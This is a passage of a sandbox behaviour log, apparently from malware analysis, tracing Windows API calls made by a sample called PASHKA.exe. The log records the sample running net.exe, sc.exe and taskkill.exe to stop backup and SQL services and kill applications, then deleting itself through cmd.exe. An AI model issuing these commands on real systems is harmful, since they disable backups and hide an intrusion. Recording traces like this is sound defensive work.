GetCurrentProcess () returned 0xffffffff [0055.626] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x378) returned 1 [0055.627] CloseHandle (hObject=0x334) returned 1 [0055.627] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0055.627] CoTaskMemAlloc (cb=0x20e) returned 0x546b9d0 [0055.627] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546b9d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0055.627] CoTaskMemFree (pv=0x546b9d0) [0055.627] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop NetBackup BMR MTFTP Service /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed04*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x756d4c0 | out: lpCommandLine="\"net.exe\" stop NetBackup BMR MTFTP Service /y", lpProcessInformation=0x756d4c0*(hProcess=0x374, hThread=0x334, dwProcessId=0xeac, dwThreadId=0xc04)) returned 1 [0055.640] CloseHandle (hObject=0x344) returned 1 [0055.640] GetFileType (hFile=0x378) returned 0x3 [0055.640] CloseHandle (hObject=0x334) returned 1 [0055.640] ReadFile (in: hFile=0x378, lpBuffer=0x756d9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x756d9b0, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0056.146] GetCurrentProcess () returned 0xffffffff [0056.146] GetCurrentProcess () returned 0xffffffff [0056.146] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x374, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0056.149] CloseHandle (hObject=0x334) returned 1 [0056.150] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0056.150] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0056.150] GetCurrentProcess () returned 0xffffffff [0056.150] GetCurrentProcess () returned 0xffffffff [0056.150] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x380) returned 1 [0056.150] CloseHandle (hObject=0x334) returned 1 [0056.150] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0056.150] CoTaskMemAlloc (cb=0x20e) returned 0x546b9d0 [0056.150] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546b9d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0056.150] CoTaskMemFree (pv=0x546b9d0) [0056.151] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config SQLTELEMETRY start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed08*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x7570ccc | out: lpCommandLine="\"sc.exe\" config SQLTELEMETRY start= disabled", lpProcessInformation=0x7570ccc*(hProcess=0x37c, hThread=0x334, dwProcessId=0xdf8, dwThreadId=0xa4c)) returned 1 [0056.253] CloseHandle (hObject=0x344) returned 1 [0056.254] GetFileType (hFile=0x380) returned 0x3 [0056.254] CloseHandle (hObject=0x334) returned 1 [0056.254] ReadFile (in: hFile=0x380, lpBuffer=0x75711bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x75711bc*, lpNumberOfBytesRead=0x53feeb0*=0x62, lpOverlapped=0x0) returned 1 [0056.645] ReadFile (in: hFile=0x380, lpBuffer=0x75711bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x75711bc, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0056.656] GetCurrentProcess () returned 0xffffffff [0056.656] GetCurrentProcess () returned 0xffffffff [0056.656] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x37c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0056.658] CloseHandle (hObject=0x334) returned 1 [0056.658] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0056.659] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0056.659] GetCurrentProcess () returned 0xffffffff [0056.659] GetCurrentProcess () returned 0xffffffff [0056.659] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x388) returned 1 [0056.659] CloseHandle (hObject=0x334) returned 1 [0056.659] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0056.659] CoTaskMemAlloc (cb=0x20e) returned 0x546bbb8 [0056.659] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546bbb8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0056.659] CoTaskMemFree (pv=0x546bbb8) [0056.659] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config SQLTELEMETRY$ECWDB2 start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fecf8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x7575044 | out: lpCommandLine="\"sc.exe\" config SQLTELEMETRY$ECWDB2 start= disabled", lpProcessInformation=0x7575044*(hProcess=0x384, hThread=0x334, dwProcessId=0x450, dwThreadId=0xe74)) returned 1 [0056.673] CloseHandle (hObject=0x344) returned 1 [0056.673] GetFileType (hFile=0x388) returned 0x3 [0056.673] CloseHandle (hObject=0x334) returned 1 [0056.673] ReadFile (in: hFile=0x388, lpBuffer=0x7575540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x7575540*, lpNumberOfBytesRead=0x53feeb0*=0x62, lpOverlapped=0x0) returned 1 [0056.960] ReadFile (in: hFile=0x388, lpBuffer=0x7575540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x7575540, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0056.966] GetCurrentProcess () returned 0xffffffff [0056.966] GetCurrentProcess () returned 0xffffffff [0056.967] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0056.969] CloseHandle (hObject=0x334) returned 1 [0056.969] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0056.970] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0056.970] GetCurrentProcess () returned 0xffffffff [0056.970] GetCurrentProcess () returned 0xffffffff [0056.970] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x390) returned 1 [0056.970] CloseHandle (hObject=0x334) returned 1 [0056.970] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0056.970] CoTaskMemAlloc (cb=0x20e) returned 0x546e208 [0056.970] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546e208 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0056.970] CoTaskMemFree (pv=0x546e208) [0056.970] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config SQLWriter start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x75789a8 | out: lpCommandLine="\"sc.exe\" config SQLWriter start= disabled", lpProcessInformation=0x75789a8*(hProcess=0x38c, hThread=0x334, dwProcessId=0x2ec, dwThreadId=0xfb0)) returned 1 [0056.992] CloseHandle (hObject=0x344) returned 1 [0056.992] GetFileType (hFile=0x390) returned 0x3 [0056.992] CloseHandle (hObject=0x334) returned 1 [0056.992] ReadFile (in: hFile=0x390, lpBuffer=0x7578e90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x7578e90*, lpNumberOfBytesRead=0x53feeb0*=0x62, lpOverlapped=0x0) returned 1 [0057.400] ReadFile (in: hFile=0x390, lpBuffer=0x7578e90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x7578e90, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0057.407] GetCurrentProcess () returned 0xffffffff [0057.407] GetCurrentProcess () returned 0xffffffff [0057.408] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0057.410] CloseHandle (hObject=0x334) returned 1 [0057.410] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0057.411] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0057.411] GetCurrentProcess () returned 0xffffffff [0057.411] GetCurrentProcess () returned 0xffffffff [0057.411] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x398) returned 1 [0057.411] CloseHandle (hObject=0x334) returned 1 [0057.411] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0057.411] CoTaskMemAlloc (cb=0x20e) returned 0x546e208 [0057.411] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546e208 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0057.411] CoTaskMemFree (pv=0x546e208) [0057.411] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config SstpSvc start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed10*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x757c2f4 | out: lpCommandLine="\"sc.exe\" config SstpSvc start= disabled", lpProcessInformation=0x757c2f4*(hProcess=0x394, hThread=0x334, dwProcessId=0xc10, dwThreadId=0xf4c)) returned 1 [0057.422] CloseHandle (hObject=0x344) returned 1 [0057.422] GetFileType (hFile=0x398) returned 0x3 [0057.422] CloseHandle (hObject=0x334) returned 1 [0057.422] ReadFile (in: hFile=0x398, lpBuffer=0x757c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x757c7d8*, lpNumberOfBytesRead=0x53feeb0*=0x22, lpOverlapped=0x0) returned 1 [0057.827] ReadFile (in: hFile=0x398, lpBuffer=0x757c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x757c7d8, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0057.833] GetCurrentProcess () returned 0xffffffff [0057.833] GetCurrentProcess () returned 0xffffffff [0057.833] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0057.836] CloseHandle (hObject=0x334) returned 1 [0057.836] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0057.836] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0057.836] GetCurrentProcess () returned 0xffffffff [0057.837] GetCurrentProcess () returned 0xffffffff [0057.837] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x3a0) returned 1 [0057.837] CloseHandle (hObject=0x334) returned 1 [0057.837] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0057.837] CoTaskMemAlloc (cb=0x20e) returned 0x546b9d0 [0057.837] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546b9d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0057.837] CoTaskMemFree (pv=0x546b9d0) [0057.837] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mspub.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x757fb9c | out: lpCommandLine="\"taskkill.exe\" /IM mspub.exe /F", lpProcessInformation=0x757fb9c*(hProcess=0x39c, hThread=0x334, dwProcessId=0xfc8, dwThreadId=0xbac)) returned 1 [0058.023] CloseHandle (hObject=0x344) returned 1 [0058.023] GetFileType (hFile=0x3a0) returned 0x3 [0058.024] CloseHandle (hObject=0x334) returned 1 [0058.024] ReadFile (in: hFile=0x3a0, lpBuffer=0x7580070, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x7580070, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0061.957] GetCurrentProcess () returned 0xffffffff [0061.957] GetCurrentProcess () returned 0xffffffff [0061.958] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0061.966] CloseHandle (hObject=0x334) returned 1 [0061.967] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0061.967] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0061.968] GetCurrentProcess () returned 0xffffffff [0061.968] GetCurrentProcess () returned 0xffffffff [0061.968] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x3a8) returned 1 [0061.968] CloseHandle (hObject=0x334) returned 1 [0061.968] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0061.968] CoTaskMemAlloc (cb=0x20e) returned 0x546b9d0 [0061.968] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546b9d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0061.968] CoTaskMemFree (pv=0x546b9d0) [0061.968] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mydesktopqos.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed14*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x7583330 | out: lpCommandLine="\"taskkill.exe\" /IM mydesktopqos.exe /F", lpProcessInformation=0x7583330*(hProcess=0x3a4, hThread=0x334, dwProcessId=0x8d8, dwThreadId=0x488)) returned 1 [0061.979] CloseHandle (hObject=0x344) returned 1 [0061.979] GetFileType (hFile=0x3a8) returned 0x3 [0061.979] CloseHandle (hObject=0x334) returned 1 [0061.979] ReadFile (hFile=0x3a8, lpBuffer=0x7583814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0) Thread: id = 5 os_tid = 0x778 Thread: id = 10 os_tid = 0xa58 Thread: id = 11 os_tid = 0xfec [0047.136] CoGetContextToken (in: pToken=0x973f6c4 | out: pToken=0x973f6c4) returned 0x0 [0047.136] CObjectContext::QueryInterface () returned 0x0 [0047.136] CObjectContext::GetCurrentThreadType () returned 0x0 [0047.136] Release () returned 0x0 [0047.136] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0047.136] RoInitialize () returned 0x1 [0047.136] RoUninitialize () returned 0x0 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x12787000" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xfc8" cmd_line = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0x88c [0044.981] GetModuleHandleA (lpModuleName=0x0) returned 0xd30000 [0044.981] __set_app_type (_Type=0x1) [0044.981] __p__fmode () returned 0x76953c14 [0044.981] __p__commode () returned 0x769549ec [0044.981] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd46fd0) returned 0x0 [0044.981] __getmainargs (in: _Argc=0xd5d1a4, _Argv=0xd5d1a8, _Env=0xd5d1ac, _DoWildCard=0, _StartInfo=0xd5d1b8 | out: _Argc=0xd5d1a4, _Argv=0xd5d1a8, _Env=0xd5d1ac) returned 0 [0044.981] _onexit (_Func=0xd48030) returned 0xd48030 [0044.981] _onexit (_Func=0xd48040) returned 0xd48040 [0044.981] _onexit (_Func=0xd48050) returned 0xd48050 [0044.982] _onexit (_Func=0xd48060) returned 0xd48060 [0044.982] _onexit (_Func=0xd48070) returned 0xd48070 [0044.983] _onexit (_Func=0xd48080) returned 0xd48080 [0044.983] GetCurrentThreadId () returned 0x88c [0044.983] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x88c) returned 0xbc [0044.983] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0044.983] GetProcAddress (hModule=0x74030000, lpProcName="SetThreadUILanguage") returned 0x74044f70 [0044.983] SetThreadUILanguage (LangId=0x0) returned 0x530409 [0044.995] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0044.995] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ffd9c | out: phkResult=0x6ffd9c*=0x0) returned 0x2 [0044.996] VirtualQuery (in: lpAddress=0x6ffda7, lpBuffer=0x6ffd54, dwLength=0x1c | out: lpBuffer=0x6ffd54*(BaseAddress=0x6ff000, AllocationBase=0x600000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.996] VirtualQuery (in: lpAddress=0x600000, lpBuffer=0x6ffd54, dwLength=0x1c | out: lpBuffer=0x6ffd54*(BaseAddress=0x600000, AllocationBase=0x600000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0044.996] VirtualQuery (in: lpAddress=0x601000, lpBuffer=0x6ffd54, dwLength=0x1c | out: lpBuffer=0x6ffd54*(BaseAddress=0x601000, AllocationBase=0x600000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0044.996] VirtualQuery (in: lpAddress=0x603000, lpBuffer=0x6ffd54, dwLength=0x1c | out: lpBuffer=0x6ffd54*(BaseAddress=0x603000, AllocationBase=0x600000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.996] VirtualQuery (in: lpAddress=0x700000, lpBuffer=0x6ffd54, dwLength=0x1c | out: lpBuffer=0x6ffd54*(BaseAddress=0x700000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0044.996] GetConsoleOutputCP () returned 0x1b5 [0044.997] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd63850 | out: lpCPInfo=0xd63850) returned 1 [0044.997] SetConsoleCtrlHandler (HandlerRoutine=0xd57260, Add=1) returned 1 [0044.998] _get_osfhandle (_FileHandle=1) returned 0x90 [0044.998] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xd6388c | out: lpMode=0xd6388c) returned 1 [0044.999] _get_osfhandle (_FileHandle=0) returned 0x8c [0044.999] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xd63888 | out: lpMode=0xd63888) returned 1 [0045.001] _get_osfhandle (_FileHandle=1) returned 0x90 [0045.001] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0045.002] _get_osfhandle (_FileHandle=1) returned 0x90 [0045.002] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xd63890 | out: lpMode=0xd63890) returned 1 [0045.003] _get_osfhandle (_FileHandle=1) returned 0x90 [0045.003] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0045.006] _get_osfhandle (_FileHandle=0) returned 0x8c [0045.006] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xd63894 | out: lpMode=0xd63894) returned 1 [0045.007] _get_osfhandle (_FileHandle=0) returned 0x8c [0045.007] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0045.008] GetEnvironmentStringsW () returned 0x764c00* [0045.008] GetProcessHeap () returned 0x760000 [0045.008] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xaca) returned 0x7656d8 [0045.009] FreeEnvironmentStringsA (penv="A") returned 1 [0045.009] GetProcessHeap () returned 0x760000 [0045.009] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4) returned 0x7646e0 [0045.009] GetEnvironmentStringsW () returned 0x764c00* [0045.009] GetProcessHeap () returned 0x760000 [0045.009] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xaca) returned 0x7661b0 [0045.009] FreeEnvironmentStringsA (penv="A") returned 1 [0045.009] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6fecf8 | out: phkResult=0x6fecf8*=0xcc) returned 0x0 [0045.009] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x0, lpData=0x6fed04*=0x88, lpcbData=0x6fecfc*=0x1000) returned 0x2 [0045.009] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x4, lpData=0x6fed04*=0x1, lpcbData=0x6fecfc*=0x4) returned 0x0 [0045.009] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x0, lpData=0x6fed04*=0x1, lpcbData=0x6fecfc*=0x1000) returned 0x2 [0045.009] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x4, lpData=0x6fed04*=0x0, lpcbData=0x6fecfc*=0x4) returned 0x0 [0045.009] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x4, lpData=0x6fed04*=0x40, lpcbData=0x6fecfc*=0x4) returned 0x0 [0045.009] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, 